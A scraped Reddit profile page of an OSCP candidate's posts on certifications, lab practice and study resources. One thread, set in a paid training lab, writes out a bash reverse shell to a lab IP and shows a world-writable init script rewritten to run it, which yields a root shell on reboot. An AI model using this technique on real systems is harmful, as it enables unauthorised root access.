Press J to jump to the feed. Press question mark to learn the rest of the keyboard shortcuts
View
Sort
Coming soon
9 points · 20 days ago · edited 20 days ago

Same dude Edit: 700/900 I just got hired as a junior pentester not to long ago( after the beta) and I know I'm new but it was still a slight kick in the self esteem.

see more

What does a day as a life of a Junior Pen Tester look like? - Hoping to change from Network Engineer to Junior Pen Tester once I have finished my OSCP...

8 points · 2 days ago

Cysa+ and cisco cyberops

see more
2 points · 2 days ago

How valued is Cisco CyberOps? - Been contemplating tackling it after Security+

161

Hello All,

I am currently studying for OSCP and aiming to buy my lab time within the next month or two depending on funds, In the meantime I have been doing various VulnHubs, HTB etc etc and I have amassed quite a lot of resources inside my dropbox which is updated daily relating to various topics which are covered in the OSCP which I thought would be fairly useful to everyone else.

If you would like access PM me your email address & I will share with you :)

You can view a preview screenshot here > https://i.imgur.com/LQc5euV.png

PS: Please excuse my weird file names such as 'AMAZING AMAZING OSCP TOOL', It's just the way I name files for myself...

Edit: /u/Thisismy15thusername Requested a Read Only Link, Here we go >> https://www.dropbox.com/sh/ba0t59c5fnccgms/AACvUbUSflWB1_AAgj8okEUra?dl=0

Thanks!

161
36 comments
Original Poster1 point · 4 days ago

Update:

I have recently tidied up the Dropbox quite a bit added a lot of new stuff, primarily Windows Stuff & Powershell.

Enjoy!

Original Poster1 point · 1 month ago

Thanks for all the nice messages guys - I have dropped some Buffer Overflow, Responder & Powershell stuff in today.

I will most likely be practicing Buffer OverFlow's & Powershell hard over the next few weeks so keep your eyes pealed on those directories for new stuff :)

This sounds like a good way to get people to donwload RATs without them knowing....hehe

see more
Original Poster3 points · 1 month ago

Damn you got me...

Load more comments

What exactly are you trying to do?

0

Hello All,

Apologies if this is a noob question but I really am lost here - I have created the following Repo https://github.com/m0chan/m0chan.github.io and enabled GitPages and if I visit m0chan.github.io it appears as it should! Great! What's the problem? 

Well I have created a folder called 'HackTheBox' where I will store reports of boxes I have completed in markdown format. I would like to be able to visit m0chan.github.io/HackTheBox/Valentine.md and it appears with the nice GitPage/Theme however it does not.... It is displaying in plain text? 

Any tips/pointers

mochan

0
1 comment
2 points · 8 days ago

Get a month membership on VirtualHackingLabs - Could not recommened it enough.

27 points · 10 days ago

Have your computer factory reinstalled, Antivirus products are easily bypassed so I would say this is the only way.

21 points · 25 days ago

I want to see the other perspectives.

see more

I also would like to know of any OSCP group chats etc...

You should be able to share the USB via Local Resources inside RDP -> https://i.imgur.com/SH475VB.png

2 points · 1 month ago · edited 1 month ago

This looks good! I've yet to attempt an OSCP so wouldn't be the best investment currently. Free Windows labs seem few and far between for obvious reasons. Anyone aware of a cache of Vulnhub style Windows labs?

see more

Exact same, I'm prepping for OSCP and only really had much chance to practice on Linux boxes besides the HTB Windows ones.

Original Poster2 points · 1 month ago

One other question:

There's a lot of other actual NetSec stuff that isn't really touched with HTB, due to boxes being reset and stuff (I'm talking using Responder, arp poisoning/spoofing, and other things that involve capturing broadcast traffic and exploiting the actual Network side of things, rather than just cracking into boxes) that I'm not familiar with. Is that covered in the Lab/Exam or is that more of a CTP level subject?

see more

I don't think Responder etc is covered in OSCP, I may be wrong.

May be worth having a look over this :- https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

Original Poster2 points · 1 month ago

4 roots on HTB after a couple days is damn good. IDK what your workday is like, if you're a student thats good but if you have a full time job that's outstanding. I honestly average about ~45 minutes to an hour on HTB per day, as it's free and there's no time restriction.

see more

I work full time 9-5 as a Junior Net Engineer / IT Support Engineer, I however work in a fairly relaxed work environment where I can find myself with 1-2 hours or more with no tickets or a easy workload where I typically remote into my home pc and do some boxes etc..

Load more comments

Sell EVERYTHING! I mean Absolutely everything & buy XRP and sell just at the right time.

Usually just opt for Dirb during labs/CTF boxes - It does the job.

"Capacity mismatch for disk C:\Users\User\Documents\Virtual Machines\Wintermute-Neuromancer\\Wintermute-Neuromancer-disk1.vmdk." When importing Neuromancer to VMWare?

Straylight imported sucecsfully okay though? Any help guys

2 points · 1 month ago · edited 1 month ago

Let's gooooooo! Finally a VM that I can learn pivoting with.

Edit: PS if anyone knows of any other VM's with pivoting please do send...

101 points · 1 month ago

Wait til he discovers 120fps+ on a 144Hz Monitor...

Are you adding the port number that the service is running on to the server address?

I.e if you are not running it on port 80 you will need to specify the port, for ex. http://172.16.10.10:8000/intern/index.php

7

Hello All,

I am currently prepping to take my OSCP hopefully by the end of 2018 and have a quick question, Throughout my preparation over the last few months I have noticed that most services/vulnhub boxes are linux and not windows (I understand due to licensing)

However I am wondering if I will be exposed to attacking Windows based systems within the OSCP? Specifically Windows 7,10 or Server 2008 / 2012?

If it is against the OSCP NDA to disclose this I will understand.

Cheers

7
6 comments

Try to bypass the helpdesk at all costs.

Get a couple decent certs under your belt, the GCIH for example.

If you're a student sign up with your uni email at Immersive Labs and work your way through all the blue team stuff.

Also have a go at some of the root-me stuff and vuln hub has some decent incident response/forensics labs you could try.

Get used to quickly finding information in logs and pcaps. There are sites/labs for this also.

Familiarise yourself with what the job of a SIEM is, sign up for a Splunk trial and familiarise yourself with it and all the terminology, once you're up and running with one SIEM, they're more less all the same.

Do all this you'll land a job in no time.

see more

Anyway to get immersive labs if I am an Apprentice in the IT industry?

6

Hello All,

I am working on a lab through a subscription I have recently bought, hence I will try be vague to not disclose the lab/company etc.

Anyway I have exploited the box and got a limited shell, I have noticed a world writeable file that I think I should add my own reverse shell too however I have no idea how to add my code to it.

This is the file :-

-rwxrwxrwx 1 root root 6 Jun 26 15:05 /etc/init.d/james

Upon 'cat'ing' the file I receive the following putput :-

#!/bin/sh

sudo JAVA_HOME=/usr/lib/jvm/default-java /opt/james-2.3.2/bin/run.sh

I am ideally looking to add something like bash -i >& /dev/tcp/172.16.4.2/8080 0>&1 into the 'james' file and reboot the server and gain a root shell?

How do I go doing this? I also hope I am on the right tracks...

Any help would be great...

6
7 comments
Original Poster1 point · 1 month ago

Finally got it!

I had to change the james file to look like this

#!/bin/sh

sudo JAVA_HOME=/usr/lib/jvm/default-java /home/james/shell.sh

Contents of /home/james/shell.sh -

#!/bin/bash

bash -i >& /dev/tcp/172.16.4.1/3333 0>&1

After running sudo /sbin/reboot I finally got a root shell!

Original Poster1 point · 1 month ago

I have tried changing the follow to as below, and rebooting the box with sudo /sbin/reboot but getting no shell back.

https://i.imgur.com/fLFhpKj.png

u/mochan98
Karma
828
Cake day
January 17, 2018
Cookies help us deliver our Services. By using our Services or clicking I agree, you agree to our use of cookies. Learn More.